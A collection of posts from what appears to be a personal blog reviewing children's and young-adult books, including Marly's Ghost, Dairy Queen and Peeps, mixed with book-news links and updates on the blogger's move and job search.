Book: Marly's Ghost
Author: David Levithin
“Marly was dead, to begin with. There was no doubt whatsoever about that.” And poor Ben, indeed, doesn’t have any doubt that his adored girlfriend is dead. How can there be, when just waking up each morning is a reminder that he’s alive and she’s not?
As his grief pulls him further and further under, Ben decides that love is a crock, a sham, something that only brings pain. It’s going to be the new mission of his life to let everyone know. On Valentine’s Eve, though, he’s visited by a ghost . . . Marly’s ghost, who is chained to Earth by the force of Ben’s anguish. She tells him that he will be visited by three more ghosts who will show him the importance of love in his life . . . and so begins the familiar story, but with a highly original twist.
I picked this book up because I’d heard good things about Levithin’s Boy Meets Boy, and when I realized it was a reworking of A Christmas Carol, which is an old favorite (see my post on it last December), I decided to check it out. I ended up reading it in one morning, and cried like a baby through the whole last stanza.
Levithin has taken the original Christmas story and closely reworked it into a Valentine’s Day story that addresses not only romantic love, but the love between friends as well. At times, the text becomes a virtual copy of Dickens’ classic (see, for instance, Ben’s self-description, or the scene where Marly’s ghost first appears to him) and at others, the language veers sharply away from the original. However, Levithin always hews very closely to the spirit of the original (even occasionally the Victorian tendency towards melodrama), in showing the interconnectedness between love and life.
A Conundrum
I'm kinda torn about this article. As a Harry Potter fan and book-lover, I like it. I mean, when was the last time a literary figure was this immediately recognizable by this many people for this amount of time? (What is it now, almost ten years?)
On the other hand, I really want to make my countrymen form a single-file line to renounce citizenship of the Planet Earth. Because they clearly are not using it.
ETA: Thanks to Blog of a Bookslut for this link.
Fire-us
Book: The Fire-us Trilogy: The Kindling, Keepers of the Flame, and The Kiln
Authors: Jennifer Armstrong and Nancy Butcher
Published: 2002-3
In a house in Lazarus, Florida, seven children between the ages of seven and fifteen are living hand-to-mouth, scavenging from abandoned supermarkets and stores. They are the only ones left. All their parents--in fact, all the adults--have been dead for five years, victims of a terrible virus that burned them from the inside out. Most of the other children are dead, unable to take care of themselves without the adults around. But Hunter, Mommy, Teacher, Baby, Doll, Teddy Bear, and Action Figure are still alive--for now.
But then Puppy and Kitty, two little children under the age of five, show up, and with them comes the strange, wild Angerman, who is determined to get to Washington, DC and to the President. When the makeshift family decides to go with them, they are plunged into a morass of impossible questions. Is anybody else alive? What really happened to unleash the Fire-us on an innocent populace? Where did Puppy and Kitty come from?
And most importantly . . . how are they going to make it to tomorrow?
This dystopic near-future story is definitely not a light weekend romp. Prepare yourself to be disturbed. I think what shook me the most was imagining the world that the kids are living in. Not only is nature retaking Florida, with a vengeance, but the kids themselves have lost even the memories of their own names in the fight to survive. (Of course, it doesn’t help to realize that if Fire-us were real, I would have died too.)
None of the older kids are poster children for sanity, but Angerman is the one with the fewest Cheerios in his bowl. One of his most frequent rants concerns the fact that they’re children and shouldn’t have to deal with all this. There should be someone around to take care of them. But both he and we quickly learn that just because an adult is around, this doesn’t mean everything’s going to be okay.
Possibly one of the neatest things that Butcher and Armstrong do is their representation of the Book, a scrapbook in which Teacher records every scrap of information, both from this new world and from the old one, that she can get her hands on. From ad slogans to dreams to pages from the phone book, at first this Book seems like nothing more than a scrambled and futile attempt to remember their old lives. But from these snippets and scraps, Teacher (and the reader) derives meaning that guides them through their new world.
Da Meme
Okay, apparently this meme is what all the cool kids in the kidlitosphere are doing these days, including MotherReader and Gail Gauthier over at Original Content. I’ll chip in.
One book that changed your life
To Kill a Mockingbird by Harper Lee--specifically the theme about walking in another’s shoes. What capacity I have for empathy I have these days can be traced right to this book.
One book you have read more than once
Wait, can I get back to you on this? There’s far too many. Oh, okay, if you insist . . . *picks one at random from bookshelf* A Ring of Endless Light by Madeleine L’Engle. It was a surprise to me to realize a few years ago that this book has no plot, as such. You just take a journey through Vicky’s summer as she tries to reconcile life and death in all their many forms. Every time someone in my life dies, I have this deep and terrible need to read it again.
One book you would want on a desert island
The Complete Works of Jane Austen. It’s in omnibus form! That’s one book! Really, though, I would pick one of JA’s books, either Pride and Prejudice or Persuasion. Every time I read them, I find something new in the story, the characters, the wit, or even just the world. That’s one of the densest writers I’ve ever experienced, and not in a bad way. She just really packs it in. Plus, on a desert island, I would really have the time to sink into that convoluted language.
Although I have to say, if I were stuck on a desert island and I did have The Complete Works, I might finally get past page 50 of Mansfield Park.
One book that made you laugh
Recently? Startled By His Furry Shorts by Louise Rennison, the seventh in the seemingly endless confessions of Georgia Nicolson. Don’t read them in a row because she does get a bit tiresome after a while, but if you space them out appropriately (i.e. read the new one when it comes out), they’re a hilarious break from adult life.
One book that made you cry
Marly’s Ghost by David Levithin. Omigod. Bawled like a baby. Look for it to be blogged soon.
One book you wish had been written
The next book in the Damar series by Robin McKinley. I adored The Blue Sword, even if I didn’t much like The Hero and the Crown. It seemed that she was gearing up for a series of loosely linked standalones, then seemed to drop it. Poor sales? No personal interest anymore? Who knows? Sigh. However, hope springs eternal, and at least she’s still writing.
One book you wish had never been written
Every #$@^!!!! Mary Kate and Ashley book on the library shelf. The squick factor is through the roof. Did those girls ever get an actual childhood?
One book you are currently reading
Specials by Scott Westerfeld. I’ve been reading a lot of dystopic YA sci-fi lately. (See tomorrow’s blog.) It’s good, but it and Pretties don’t seem to have the special sparkle that Uglies did.
One book you've been meaning to read
Happy Kid! And I’m not just saying that to suck up to Gail.
More blogtastic books tomorrow!
So What Does It All Mean, Really?
Neat article from the Stanford Magazine: a quick profile of an English professor discussing the appeal of children's literature and the reason kids love it (and many parents don't understand it). Agree? Disagree? Comment!
Confessions of a Teenage Drama Queen
Book: Confessions of a Teenage Drama Queen
Author: Dyan Sheldon
Lola Cep, star in the making, has always suffered from being surrounded by normalcy. First her parents had to go and name her Mary Elizabeth (ugh!). Then she’s taken away from New York City, the center of the universe, to suburbia hell, otherwise known as Dellwood, New Jersey.
But a true artiste remains strong through trauma, so nothing’s going to keep Lola down--not her soul-deadening surroundings, not her mother and sisters’ disrespect for her suffering, not the breakup of Sidhartha, the best band ever. At least she’s got a new best friend, even if Ella Gerard is depressingly practical most of the time.
And, of course, what’s a great heroine without a great villainess? In this drama, that’s the part of Carla Santini, queen of Dellwood High, who’s always gotten whatever she wants . . . until Lola came along. It promises to be a battle of epic proportions, so pop a bag of popcorn and sit back to enjoy the show.
This is the way I feel about this book. I haven’t seen a Lindsay Lohan movie since “The Parent Trap,” but if “Confessions of a Teenage Drama Queen” is even half as good as its source material, I’m heading for the nearest Blockbuster right now.
Lola’s first person narration overflows with drama and trauma to the point of hilarity, and Sheldon adds enough redeeming qualities--such as Lola’s genuine talent at acting and her determination not let the Evil Carla win--to keep her from becoming cartoonish. Some of the story elements are a bit farfetched, but it fits the tone.
Finally, for me, the best part of this book was watching Lola’s influence transform Ella from a frightened shadow into a tough, smart and gutsy gal in her own right, more than able to handle both Carla Santini and Lola herself. If Lindsay had had an Ella in her life, maybe she’d be better off today.
It was a dark and stormy night . . .
It's that time again!
No, the annual pig-Jello-wrasslin' exhibition has been postponed indefinitely.
I'm talking about the Bulwer-Lytton awards! These pristine examples of truly bad writing have been responsible for liquids snorted out peoples' noses since 1982. Go check 'em out.
Book: Dairy Queen
Author: Catherine Gilbert Murdock
D.J. Schwenk’s not one to complain. Ever since her dad busted his hip, her younger brother got all wound up in summer sports, and her two older brothers quit coming home from college, she’s stuck basically running her family’s dairy farm. But she doesn’t protest, because that’s not what you do in the Schwenk family. In the Schwenk family, you keep your head down and keep going.
When D.J. gets saddled with summer help in the form of one Brian Nelson, she's very annoyed. She doesn't want to babysit some stuck-up quarterback, whining about all this work. To make things, he's the quarterback for her hometown's deadliest rival. What did she ever do to deserve this?
But Brian Nelson doesn't turn out to be the complete and total pain in the behind she was expecting. Sure, he whines a little, yeah, he’s not really the best worker in the whole world. But he does do one thing that nobody’s ever managed . . . he gets D.J. to start talking, really talking, about her life. Once D.J. starts to talk, she also starts to listen . . . and she finds out that a lot of the people she loves have something to say.
Is this a pre-ball Cinderella story? A Romeo-and-Juliet romance? A story about a girl playing football? It could have been any of these things, but instead Catherine Gilbert Murdock lets those settle into subplot status and concentrates on the theme of communication--what happens when we do, when we don’t, when we begin, and when we end.
I also have to note that football is so not my thing, but not only was I able to understand D.J.’s and Brian’s involvement in it, I was able to get into the emotional attachment of a whole town and a single family to a sport. Not bad.
Revenge of the Witch
Hey Bibliovore! Where ya been?
Setting up my apartment, buying furniture, starting my new job . . .
Is that all? Pffft. How lame.
I know, but to make it up to you, I will give you . . . a book review! Tralaaaa!
Really? Wow! Hey . . . wait a minute . . .
Book: The Last Apprentice - Revenge of the Witch
Author: Joseph Delaney
Born the seventh son of a seventh son, Tom never knew that was important until he was apprenticed to a spook. Spooks hunt ghosts, fight witches, and generally deal with all the other supernatural messes that normal people would rather not think about. It’s a lonely, difficult life, but almost against his will, Tom realizes he has a knack for it. But a knack isn’t enough. The spook's prior apprentice, Billy Bones, had a knack, too, and he’s currently six feet under, along with an unsettling number of the spook's previous apprentices. And now that Tom’s accidentally unleashed a witch who’s been chained up for thirteen years, he’s going to need a lot more than a knack to ensure that he doesn’t end up next to Billy Bones.
Like Peeps, this creepalicious novel isn’t for the faint of stomach. Any novel that features violent death, zombie witches, and cakes baked with blood isn’t for the delicate type. But there’s a dark lure to the story, drawing the reader through Tom’s well-intentioned screwups and struggle to right them, and the moral murk that means no decision is easy.
Alice, Tom’s sometime ally and the granddaughter of the abovenoted witch, could and probably should have been fleshed out a little more, because instead of being sympathetic to her torn loyalties, I just got annoyed. But that’s a small nitpick in a gorily fun time. This is a great novel for those fans of fantasy who like a healthy dose of horror mixed in. Amazon indicates that the second novel in the series is coming in September. I'll be interested to see where Joseph Delaney takes Tom from here.
P.S. Okay, Amazon also seems to indicate that in 2004 Delaney published a book called the Spook's Apprentice, which sounds quite a bit like this one. Hmmm . . . odd! Is Revenge of the Witch rewritten, or just repackaged? If you know the answer to this conundrum, leave it in the comments.
Never Mind!
No, really, that's the book title!
Book: Never Mind! A Twin Novel
Authors: Rachel Vail and Avi
Meet Edward and Meg Runyon. These NYC twins have always suffered from being total opposites in a world that thinks they should be exactly alike just because they were born on the same day. Meg is the goody-goody, high-achieving, smart twin. Edward is the laid-back, mischievous, fun twin. They have absolutely nothing in common. Now they’re even attending separate schools, and it looks like they’re going to drift further apart than they already are.
That’s until Edward, as a one-time joke, tells the queen bee of Meg’s new school that he and his fictional band, Never Mind, are coming to her party next Saturday. How was he to know that Meg has already told Kimberly that her super-cool twin brother and his hot band, Never Mind, will play at her party on Saturday?
Maybe they have more in common than they think . . .
I picked this book up because of Avi, whose
Romeo and Juliet Together (And Alive!) At Last I blogged awhile back. I normally try not to rec the same author twice . . . I figure if you’re anything like me, you go looking for their other stuff if you enjoyed the first one. I’m fudging this because Avi co-wrote it, and just cuz it’s such a fun book. Through a farcical tangle of miscommunication, complete delusion, and unlikely coincidences, the worst nightmares of either twin seem poised to come true on that fateful Saturday night.
By the end, you may join Edward and Meg in saying, “Uh, what exactly happened?” But maybe all you need to know is that these night-and-day twins are finally starting to appreciate each other for their similarities and even their differences.
And as for the rest of it?
My hotel has wireless. So y'all will get a book review tomorrow and an update today.
See over on the side? That list of book covers? I'm newly on LibraryThing. Okay, right now I only have four books on that list, but once I get an apartment and get unpacked, there will be more.
Piffle on Independence Day
The heck with July fourth. It's almost BAFAB week! What is BAFAB? It's Buy A Friend A Book week. Plus, BAFAB is a holiday all round the world, which American Independence Day isn't (although many Americans think so).
BAFAB today! Or next week. Or both.
Of Course She Does
Rowling plots to kill Potter characters
Okay, my bets are on Hagrid and . . . erm . . . let's see . . . at least one Weasley parent. I'll be really mad if she kills off Ron or Hermione after I've spent this long rooting for them.
Thanks to Blog of a Bookslut.
You may have noticed that I didn't post any bookish news last week. (Or maybe you didn't. Who knows.) Well, it's like this. I got a job (hooray!) but it's in another state (yargh). So all my time is now spent boxing up my approximately 10,000,000 books in order to flee across state lines. I may not be able to post with a book review next Monday, as I'll be wandering around trying to find apartments with sturdy enough floors that I and my entire collection of Madeleine L'engle novels won't fall through the ceiling into somebody else's living room.
However, when things settle down, it'll be back to worm-eating principals and book reviews every Monday like clockwork. Promise.
Book: Millions
Author: Frank Cottrell Bryce
What would you do with a million? Damian would really like to know, because he’s all out of ideas. See, he’s got a million pounds. It came down from the sky in answer to his prayer. His materialistic brother Anthony is ecstatic, and they’ve suddenly become the stars of the school yard. But with only a few days left before Britain switches to the euro and all that money is rendered useless, (not the mention that the people who lost the money in the first place would really like it back) the brothers are finding out that even a million pounds is way more trouble than it’s worth.
The basic premise is simple enough, but in the end, Millions is not really about money. It’s about grief, about ethics, and about figuring out what’s right and then doing it. The two boys are reacting to and dealing with their mother’s death in drastically different ways: Damian by absorbing every iota of information he can about saints’ lives, Anthony by knowing the value of money really, really well. Perhaps the trickiest element of this story is Damian's conversations with saints like Claire of Assisi, St. Peter, and even St. Joseph. In the hands of many authors, maybe even most authors, this would have come out cloying, weird, stuff-it-down-your-throat religious, or just implying that Damian is really cracking up. But Bryce handles it lightly and deftly, bringing out the human side of the saints and making Damian's asking for their advice a normal child's desire for guidance by respected adults.
The story behind the story is almost as interesting. Bryce wrote Millions as a screenplay first, and then adapted it into a novel which came out simultaneously or just before the movie. The movie is as charming and possibly even more magical in tone than the book, although it did leave some important bits out.
Boy 2 Girl
Book: Boy 2 Girl
Author: Terence Blacker
Meet Sam Lopez, the new girl, who’s just moved to England from America. She’s tough. She’s funny. She doesn’t take any guff from anybody. She’s the most popular girl at school--every boy wants her, every girl wants to be her.
If only they knew Sam isn’t Samantha, but Samuel.
Sam’s exasperated cousin, Matt, initially dared him to make the big switch, thinking it would be good for a laugh and teach his wild cousin a thing or two. But his brilliant idea snowballs until it’s bigger than anybody, even Sam, can control. From an obviously biased teacher to the reactions of the other students to the observations of secondary characters, Blacker writes a hilarious novel that examines the way that gender is defined by the outside world.
I really took to this book, which takes a premise right out of Monty Python and uses it as a framework to ask all sorts of questions about sex and gender. Blacker also uses the unusual narrative device of telling the story from a multiplicity of first-person POVs, from Matt to the girls at school to the little old lady walking by in the park. In fact, the only character who never does have his say is Sam himself, which further underscores the theme of one’s gender being defined and interpreted by others.
While much of the focus is on the humorous Victor/Victoria dichotomy of a boy posing as a girl, Blacker also weaves in a more serious and emotional story about Sam, his dead mother, and his absent father. My only quibble with this book is that, until close to the end, the subplot involving Sam’s biological father descends into stereotypical farce rather than the inspired and thoughtful hilarity of the rest of the book.
Holy Schnikes
Mother Reader has not only pledged to blog all she reads for the next 48 hrs, she's sucked others in with her. Dear god, will the world never be safe from voracious readers of children's lit who then blog to share the goodness with others? I hope not.
(But Bibliovore, why aren't you doing this?)
(I like sleep.)
(Wimp.)
(Yes.)
Red Hot Diggity
Either I'm really bored right now, or there's a lot of cool book news. Given that there's almost always a lot of cool book news, I'm going with option number 1.
As if indexing the rest of the known world weren't enough, Google is introducing Searchable Shakespeare texts.
Okay, not technically kid's lit, but I did warn you I'm a recovering English major. See, it's right up there. There! In the title.
A New Low in School Lunches
Conestoga Elementary School serves worms
Actually, this story is about a principal and a librarian who dared their students to read 100 million words over the course of the school year. If they succeeded, the principal would eat fried worms, in honor of the classic gross-out book by Thomas Rockwell.
Well, they did . . . and did he? Read it and find out.
File This Under "Hmmm"
Hawking to Write Children's Book
Normally I would rail for awhile against those goonballs who think they can write a children's book in an evening. However, it appears he's writing nonfiction (or possibly fiction with lots of education) in his area of expertise, unlike, say, Madonna. Plus I liked A Brief History of Time, the parts that I understood, anyway.
But I still think I'll wait until it comes out to make any judgements.
The Dewey Donation System
The Dewey Donation System has this really cute logo of a little dot with a book on its head . . . oh, you want to hear what it does.
The DDS (way different from the DDC; and if you laughed at that joke, you're a librarian) calls attention to people or libraries in dire need of books. The libraries set up Amazon wish lists, nice people buy books, Amazon sends them and everyone's happy. The DDS has helped out Oakland Public Library after catastrophic budget cuts, San Diego Public Library after wildfires, Indian schoolchildren after the tsunami, and now have turned their formidable attention to Katrina-devastated libraries in the Gulf Coast.
Do it because you're a nice person. Or because you really, really need brownie points in heaven after that crazy weekend in Vegas when against all reason and laws of mathematics, you may have actually broken eleven commandments. Y'know. Either way.
You Are *So* Cursed!
It's Monday! And what does that mean?
No, it does not mean that I need a caffeine IV. That's not exclusive to Monday. I need one of those every day.
Book: You Are So Cursed!
Author: Naomi Nash
Vick's the school witch, and she makes sure everyone knows it. She's doing a good job--everyone but her tiny group of misfit friends is terrified of her. But she's got a big secret, and here it is: while she's got a real gift for magic, it's got more to do with Houdini than Hecate. When Gio, a popular and well-liked guy (in other words, Vick's perfect antithesis), realizes this and starts getting close, the first bricks in Vick's wall start to crumble. It gets worse when the friends that she's been protecting for so long suddenly seem to turn on her. In the end, Vick has no choice but to let someone in or be alone forever.
I picked this book up for the title--it made me laugh, especially with the cover photo of a sour-faced, sterotypical goth girl sneering out at you. I kept reading because it inverted and undid my expectations. Although some of the secondary characters suffer from 2D-itis, Vick leaps off the page in full and complex life. Vick's story is bitterly, caustically funny, heaping withering scorn on stratified high school society that never looks beyond the outside. Weaving in a real respect and affection for "street magic," the illusions and misdirection used by stage magicians, Nash tells the story of a tough girl who's a secret marshmallow, and how love and friendship are scarier than even black magic.
Like every other freakin' kidlit blog in the whole entire world, I am posting a link to the Guardian's interview with Daniel Handler, AKA Lemony Snicket. It's mostly about his recently published adult novel, but he does chat a little about the Lemony Snicket phenomenon, like he will have to do for the rest of his natural life. I imagine reporters will exhume him after his death to ask him about Lemony Snicket, and he will curse them eloquently.
Anyway . . . enjoy, y'all.
The Penderwicks
Book: The Penderwicks: A Summer Tale of Four Sisters, Two Rabbits, and a Very Interesting Boy
Author: Jeanne Birdsall
The four Penderwick sisters, Rosalind, Skye, Jane, and Batty, with their enormous, galumphing dog, Hound, and their dreamy, permissive dad, are off to have a great summer in a rented cottage. When they arrive, they discover that the cottage is on the grounds of a massive estate, which comes complete with a cute gardener, a really scary owner, and the owner’s bored son, about to be sent off to military school completely against his will. The Penderwicks immediately decide it is their duty to make sure that Jeffrey gets a great summer, and if they can swing it, a way out of that stupid military school.
If anyone can do it, they can.
Much as I love them, the one thing that always grated on my nerves about classic children’s adventure stories (think Nesbit’s The Railway Children, Barrie’s Peter Pan, or Cooper’s Over Sea, Under Stone) was how annoying the girls were. They were always dragged along against their will, fussing that they’d get in trouble, or whipping out the spotlessly clean, perfectly pressed handkerchief and wiping smudges off their resisting brothers’ faces.
Well, no more. While Rosalind is plenty fussy and mothery, that seems to be more because she’s the oldest. The rest of the Penderwick girls (and even sometimes Rosalind) hurl themselves headlong into trouble, and for once, they’re dragging the boy along. The subtitle has it right: while there are problems and conflicts, this entire story seems to take place in a golden, innocent bubble of summer fun.
10 Ways Parents (inadvertantly) Discourage Their Kids From Being Readers
Ran across this thanks to another kidlit blog. Read! Now! Especially if you are a parent. #1 and the unnumbered reason are my biggest pet peeves, but all the rest are pretty high up there too.
Post tomorrow! Baking in the oven as we speak.
Al Capone Does My Shirts
After looking at my list of recent posts (or more accurately, the dates attached), I realized it wasn't fair to blog so irregularly. From now on, I'll try to post every Monday(ish). Of course, more often if I get great new books. In the meantime, cross your fingers for me; I may have a line on a librarian job.
Book: Al Capone Does My Shirts
Author: Gennifer Choldenko
Twelve-year-old Moose’s family moved for his dad’s job. Pretty run-of-the-mill, right? You read this story every day. Well, considering that his dad’s new job is on Alcatraz . . . not so much.
It’s 1935, and the country is hip-deep in the Great Depression. Meanwhile, Alcatraz is full to the gills with the very best celebrity criminals, but none is more famous than Al Capone. Moose would be more excited, if it weren’t for the crazy schemes of the warden’s manipulative daughter, fitting in at a new school, and most of all, taking care of his fifteen-year-old sister.
The family also moved so that Natalie can go to a special school, where she might actually be “cured” of the mysterious condition that manifests itself in obsessive-compulsive behaviors and an inability to connect to others. Moose has seen it all before, though, and he holds little hope that Nat will ever be normal. But when the school rejects her on the grounds that she is too old, Moose cooks up the craziest scheme of them all, just in case.
Choldenko’s writing evokes both the odd world of an everyday kid living on Alcatraz and the experience of a family so focused on one child that the other often falls by the wayside. The part of Moose, and this book, that I loved best was the realistic mix of feelings he has for Natalie. He loves her and is as ferociously protective as either of his parents, but tangled up with that is frustration that he has to sign away so much of his life to her needs, anger that she can’t just be like other girls, and a kind of helpless acceptance that she will never get better, no matter what his mother wants to think. Choldenko notes in an afterword that these days, Natalie would be diagnosed as autistic, a disorder unknown in the 30’s. Pick up this book and hand it to your favorite fan of historical fiction.
Bad Girls in Love
So I guess after that orgy of book posting last week, I got distracted again. I get distracted easi--ooh, shiny thing! Anyway, here's the tale of a chica with the focus of a buzzsaw.
Book: Bad Girls in Love
Author: Cynthia Voigt
Best friends Mikey and Margalo are Bad Girls, and proud of it. Oh, they don’t drink, smoke, or engage in juvenile delinquency. God, no, that’s so predictable. No, they’re Bad Girls because they act, think, and dress exactly as they please, without bowing to the opinions or preferences of teachers, parents, or classmates.
But now there’s one person whose opinion matters very much to Mikey. That’s gorgeous Shawn Macavity, the communal eighth-grade crush. Margalo knows a bad idea when she sees it, but she also knows Mikey. She can either get in the way and be mown down, or stand back and pick up the pieces. Because there’s one thing that the Big L can’t do, and that’s make a Good Girl out of a Bad one.
Much like her characters, Voigt flatly refuses to bow to the cliches of your traditional middle-school first-crush book. Mikey remains fundamentally herself even when she’s chasing after Shawn. She goes at love the same way she attacks life--damn the torpedos and full speed ahead. No matter how many times the stunningly self-involved Shawn brushes her off, she’s ready to try again. Though Margalo doesn’t have much to do in this book except color commentating, Voight tells most of the story through her eyes. Without sentiment or sensation, Voight skillfully evokes the rarified world of middle school, with all its unwritten rules, and the experience of two highly singular girls in luuuuuuuurve.
Also definitely check out the rest of the Bad Girls series: Bad Girls; Bad, Badder, Baddest; and It's Not Easy Being Bad.
Lisa Yee Doubleheader
I wavered between the two of these for awhile. Which one, which one, should I blog? I loved them both, for different reasons. Then . . . DUH . . . I realized I could blog them both! So here goes.
Book: Millicent Min, Girl Genius
Author: Lisa Yee
High-schooler Millicent Min has never been off the honor roll. She’s been on Leno and Jeopardy. She knows Latin.
And, oh yeah. She’s eleven years old.
Millie’s looking forward to a great summer (even if only one person signed her yearbook), filled with the literature class she’s taking at the nearby university and hanging out with her fabulous grandma, Mimi. But then her evil parents sign her up for volleyball (eek!) and offer her as a tutor to annoying family friend Stanford Wong (ugh!). Millie’s sure this summer is going to suck. Then she meets Emily. Emily thinks she’s funny. Emily thinks she’s cool. And most of all, Emily thinks she’s a normal girl. And Millie will do anything to let her keep on thinking that.
I loved Millie from the first page. She’s utterly brilliant and charmingly clueless. Her literal-mindedness and sheer bafflement when confronted with unwritten rules remind me very much of Owl, the main character of Patrice Kindl’s Owl in Love. While the comedy is very broad in the first part, mostly pitting Millie against interpersonal subtleties that she doesn’t understand, she rounds out nicely when she meets Emily and ventures into the new discipline of getting, keeping, and being a friend.
Book: Stanford Wong Flunks Big-Time
Stanford Wong has just committed The Cardinal Sin in the Wong family. He’s flunked English. His perfectionist dad doesn’t care that Stanford’s the star of the basketball team and one of the most popular guys in school. All he can see is that big red “F” on his son’s report card.
Before you can say “free throw contest,” Stanford’s out of basketball camp and into (ack!!) summer school. As if that weren’t bad enough, he’s getting tutored by that annoying Millicent Min, one of those Chinese geniuses who ruins everything for normal guys like him. He’s got to get to September without killing Millie, without letting any of the guys know that he flunked, and somehow getting the attention of Millie’s cute friend Emily. Good luck!
Stanford’s story is a little more serious than Millie’s, involving as it does subplots about his troubled relationship with his dad and the removal of his beloved grandma to a nursing home. To me, this was unexpected because Stanford comes across as the King of the Clueless Doofuses (Doofi?) in Millie’s book, but not unwelcome. This isn’t a sequel, at least not chronologically speaking, since it takes place in the same time frame as Millicent Min, Girl Genius.
NOTE: Fans of these two books will be delighted to know that Yee is writing a book about Emily, So Totally Emily Ebers. No news on whether it will take place during the same summer as Millie and Stanford’s books, or sometime afterward. Here’s hoping it’s the former, because I feel like there’s a story in Emily’s summer.
Ooo . . . pretty colors . . .
If you're looking at this online and not on an aggregator, you may have noticed that the background is less . . . how can I say this? Dull. I kind of liked the tranquil look before, but this whole dot thing seems funner, especially for a kidlit blog. And yes, I do have a degree in English, thank you very much. Hmf.
My fave links (plus new ones!) will probably be back tomorrow, when I'm not so tired. Also probably soon, more books!
Dorp Dead
I have lots of books to blog! So here's one more.
Book: Dorp Dead
Author: Julia Cunningham
Eleven-year-old Gilly Ground hates the orphanage. He hates the loud gongs, he hates the food, and he hates being surrounded by other people all the time. So when he gets apprenticed to a ladder-maker, Gilly thinks he's got it made. In this new place, everything is quiet, peaceful, and in its place. A little too much in its place. Soon, Gilly discovers that Mr. Kobalt is so fixated on order that he will do anything--anything--to ensure that order. And the only way Gilly can free himself and Mr. Kobalt's oppressed dog, Mash, from this cage is by using his not-inconsiderable wits.
I gotta say it; this is a weird book. I don't normally pick up creepy novels, but this one grabbed me. (Okay, not literally.) It's a quick read (I probably finished it in an hour), but don't be fooled into thinking it's easy. Like the best of Alfred Hitchcock, Cunningham relies mainly on psychological horror instead of gore and violence. Even more, Gilly's tale forces you to think about the uses and abuses of order and stucture, and the nature of cages, both literal and self-imposed.
The Keys to the Kingdom
I liiiiiiiiiiive!
On Saturday, I get my MLS (if all goes according to plan) and will sally forth into the world of unemployment and job hunting. However, from now on I will hopefully have more time to blog.
Series: The Keys to the Kingdom
Author: Garth Nix
Published: starting 2003
Arthur Penhaligon is having a really long week.
On Monday, he nearly died. On Tuesday, he became a slave. On Wednesday, he almost drowned. And now, on Thursday, he's been plunged into a war with the demonic Nithlings for dominion of the House.
Most of the Keys to the Kingdom series takes place in the intricately realized world of the House, a super-universe in which our universe exists. There's trouble in the House. Long ago, the Architect of the House made a Will so that everyone would know what to do with Her House. But the Will's been split up, and nothing can be done until it's whole. The seven Guardians have a vested interest in making sure that the Will stays split . . . but the Will itself has an even more vested interest in becoming whole again.
So it finds Arthur . . . and thus start his adventures, fighting the seven Guardians, hunting down the missing pieces of the Will, and figuring out what's really going on around here.
Yep, it's a long damn week. And it ain't over yet.
I don't normally go in for high fantasy, with the fate of the world in balance and stuff. Thinking about it, I'm not completely sure why I like these books. But The Keys to the Kingdom series is addictive. The world of the House is intricately realized, peopled with fascinating characters. Nix layers his story with symbolism, but lightly enough so it's more of an "oooo!" moment when you figure out the symbols than a "shoot, what is going on around here?" when you haven't.
Most of all, Arthur himself is a draw for me. Scrawny, asthmatic, and unassuming, he's the opposite of your traditional hero. He's just doing what he's gotta do, but somehow this make him completely heroic to me.
The books are all titled after the particular Guardian that Arthur faces in each, and so far they go: Mister Monday, Grim Tuesday, Drowned Wednesday, and Sir Thursday, with more to come. Word of advice: don't start this series in the middle. You'll only wind up confused and wishing that you'd just read Mister Monday first, like I told you to.
Sam Llewellyn Update
Remember back when I blogged Little Darlings, I said I would pick up anything else by Sam Llewellyn that came my way? Well, something has: Bad, Bad Darlings. I snatched it up the second I saw it at the library, and it's in my to-be-read pile as we speak. What are you waiting for? Go! Run like bunny! Get the book!
Romeo and Juliet - Together (And Alive!) At Last
Book: Romeo and Juliet - Together (and Alive!) At Last
Author: Avi
Pete Saltz is desperately in love with Anabell Stackpoole. Indications are good that she reciprocates, but they're both too shy to do anything about it. What's a best bud to do? If you're Ed Sitrow, you cook up a plot to put on "Romeo and Juliet," casting Saltz as Romeo and Stackpoole as Juliet. After all, if they play the most famous couple in history, they're going to have to at least look at each other, right?
But the path to true love never did run smooth. Although the entire eighth grade gets in on it, Ed's slight case of overconfidence means that they have two weeks to rehearse, no teacher help, a borrowed set and costumes (borrowed from where? Well might you ask), and by the way, doesn't anybody know how to work those stupid curtains? Boy, does Saltz ever owe him one.
Being an English geek, I really took to this story, especially the hilarious mangling of Shakespearean language ("O, lemon table day!") in their disaster-riddled performance. It's not deep lit-chra-chure, but it's light and hilarious and strangely touching in the depiction of first love and middle-school friendship. Read it for a sweet, diverting, and roll-on-the-floor funny couple of hours.
Did you think I stopped reading or something?
Book: Peeps
Author: Scott Westerfeld
No, this book has nothing to do with those marshmallow critters you get in your Easter basket and a) disembowel with unsettling glee, b) blow up in the microwave, or c) let sit around until they're roughly the density of cement, and then try to eat.
This book is about Cal. His life has taken a turn for the weird recently. On his first night in New York City, he had a drunken one-night stand. It's not until several months later, after every girl he's so much as kissed has turned into a cannibalistic monster, that he figures out the mysterious Morgan was a vampire. Lucky for him, he's semi-immune to the parasite that causes vampirism. But now, with the help of the secret Night Watch, he's got to track down all his exes and put them out of vampiric commission. Then he's got to find Morgan and figure out just what's going on . . . because there's definitely something going on.
Don't read this after eating, especially if you're eating spaghetti and meatballs. It can get pretty creepy and gory, but not gratuitously so. Cal retains a little bit of just-off-the-bus Texas farmboy innocence, even as he's doing a very dangerous and thankless job. Lacey, the new flame (whom he can't even kiss--sigh), counterbalances him as the acerbic, cynical Noo Yawker.
The premise may sound like a Buffy rip-off, but Cal's matter-of-fact, just-doing-my-job attitude, the strong grounding in biology, plus the lovingly drawn New York City that Cal and the Night Watch move through and under, keep it feeling real. This book is very heavy on the science, which was a plus for me because I love finding things out. Westerfeld weaves biology and parasitology into the fabric of his story, as well as intercutting the chapters with breezy mini-essays on real-life parasites. Close to the end, these tend to disrupt the flow of the story, but they're still pretty neat for those with strong stomachs. If, however, you choose to skip them, it probably won't detract too much from the experience.
Note of interest: I found this book through a recommendation from Unshelved, a web-based comic strip about a public library that runs "Book Club" features every Sunday.
Book: The Wish List
Author: Eoin Colfer
Meg Finn's got a problem. See, she's dead. Wait, that's not the problem. The problem is, she died with her soul so perfectly in balance that she can't go to either heaven or hell. So now she's got to return to earth and hopefully nudge it a little further onto the positive side. To do that, she's been assigned to help Lowrie McCall complete his "wish list."
Lowrie is dying, alone except for a chestful of regrets. But his wish list is going to change that. All the times in his life when he should have done one thing and instead did another, he wants to fix. Sure, he can't go back in time and kiss that beautiful girl that eventually married his best friend. But he can find her today. But only with Meg's help. And if Meg's erstwhile partner-in-crime (literally), the now-demonic Belch, has his way, even Meg's best efforts won't do the trick.
